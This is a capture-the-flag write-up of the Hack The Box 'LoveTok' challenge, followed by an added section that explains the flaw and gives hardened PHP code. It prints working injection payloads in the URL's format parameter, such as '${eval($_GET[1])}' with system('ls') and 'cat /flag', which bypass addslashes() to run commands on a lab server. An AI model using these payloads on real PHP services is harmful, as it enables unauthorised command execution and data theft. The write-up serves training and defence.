Description:
True love is tough and even harder to find. Once the sun has set, the lights close and the bell has rung… you find yourself licking your wounds and contemplating human existence. You wish to have somebody important in your life to share the experiences that come with it, the good and the bad. This is why we made LoveTok, the brand new service that accurately predicts in the threshold of milliseconds when love will come knockin’ (at your door). Come and check it out, but don’t try to cheat love because love cheats back. 💛
Go to Hack The Box and click on Start Instance.

It gives the Host address

Paste the host address into the browser to load the challenge page.

If we click the “Nah, that doesn’t work for me. Try again!” button, a new time is shown. We also notice that the URL has changed: “?format=r” has been appended.

http://134.122.106.163:30222/?format=r

<?php
class TimeController
{
    public function index($router)
    {
        // The format comes straight from the query string, defaulting to 'r'.
        $format = isset($_GET['format']) ? $_GET['format'] : 'r';
        $time = new TimeModel($format);
        return $router->view('index', ['time' => $time->getTime()]);
    }
}

http://134.122.106.163:30222/?format=${eval($_GET[1])}&1=system(ls);

The 1 variable is one we define ourselves. Its value is parsed and evaluated by the PHP eval() function in the challenge source code and does not actually go through the addslashes() function, at least not in a direct way. So we can use quotes in our self-referenced variable, in the following way:

http://134.122.106.163:30222/?format=${eval($_GET[1])}&1=system('ls%20../');
ls command on / directory
http://134.122.106.163:30222/?format=${print(`cat /flag*`)}
or
http://134.122.106.163:30222/?format=${system($_GET[1])}&1=cat+/flagIVmuX

FLAG : HTB{wh3n_l0v3_Redacted_p0pp1ng}

Conclusion:
There are various ways to bypass an addslashes() restriction filter when user input is passed to the PHP eval() function. There might even be a broader attack surface, as the addslashes() bypass described above might be applicable to other kinds of attacks in some specific cases, such as SQL injection or command injection.
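The root cause and one fix, as an added PHP example that is not part of the original write-up or the challenge source. It assumes the time model filters the format with addslashes() and then interpolates it into a double-quoted eval() string; `survivesAddslashes` and `safeTime` are hypothetical names.

```php
<?php
// Added example, not the challenge's code. Assumption: the model runs
// addslashes() on the format and places it inside a double-quoted string
// that is handed to eval().

// addslashes() escapes only ', ", \ and NUL. A "${...}" expression contains
// none of these, so the filter returns it unchanged and eval() would still
// treat it as PHP when the double-quoted string is parsed.
function survivesAddslashes(string $input): bool
{
    return addslashes($input) === $input;
}

// Hardened replacement: no eval() at all, and the format is restricted to
// letters (date() format codes) plus a few plain separators. Backslash,
// quotes, '$', braces and parentheses are rejected.
function safeTime(string $format, int $timestamp): string
{
    if (!preg_match('#\A[A-Za-z ,:/.\-]{1,32}\z#', $format)) {
        $format = 'r'; // fall back to the controller's default
    }
    return date($format, $timestamp);
}

date_default_timezone_set('UTC');
$ts = 0; // constructed sample timestamp (Unix epoch)

// The format string from the write-up passes the filter untouched...
var_dump(survivesAddslashes('${eval($_GET[1])}'));
// ...while a constructed string containing a double quote is altered.
var_dump(survivesAddslashes('Y"m'));

// With the hardened function the same input is data, never code:
echo safeTime('r', $ts), PHP_EOL;                 // normal request
echo safeTime('Y-m-d H:i', $ts), PHP_EOL;         // custom but valid format
echo safeTime('${eval($_GET[1])}', $ts), PHP_EOL; // rejected, default used
```

Removing eval() is the actual fix; the allowlist is defence in depth and keeps unexpected characters out of the rendered page.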
Thanks For Reading
Happy Hacking !!!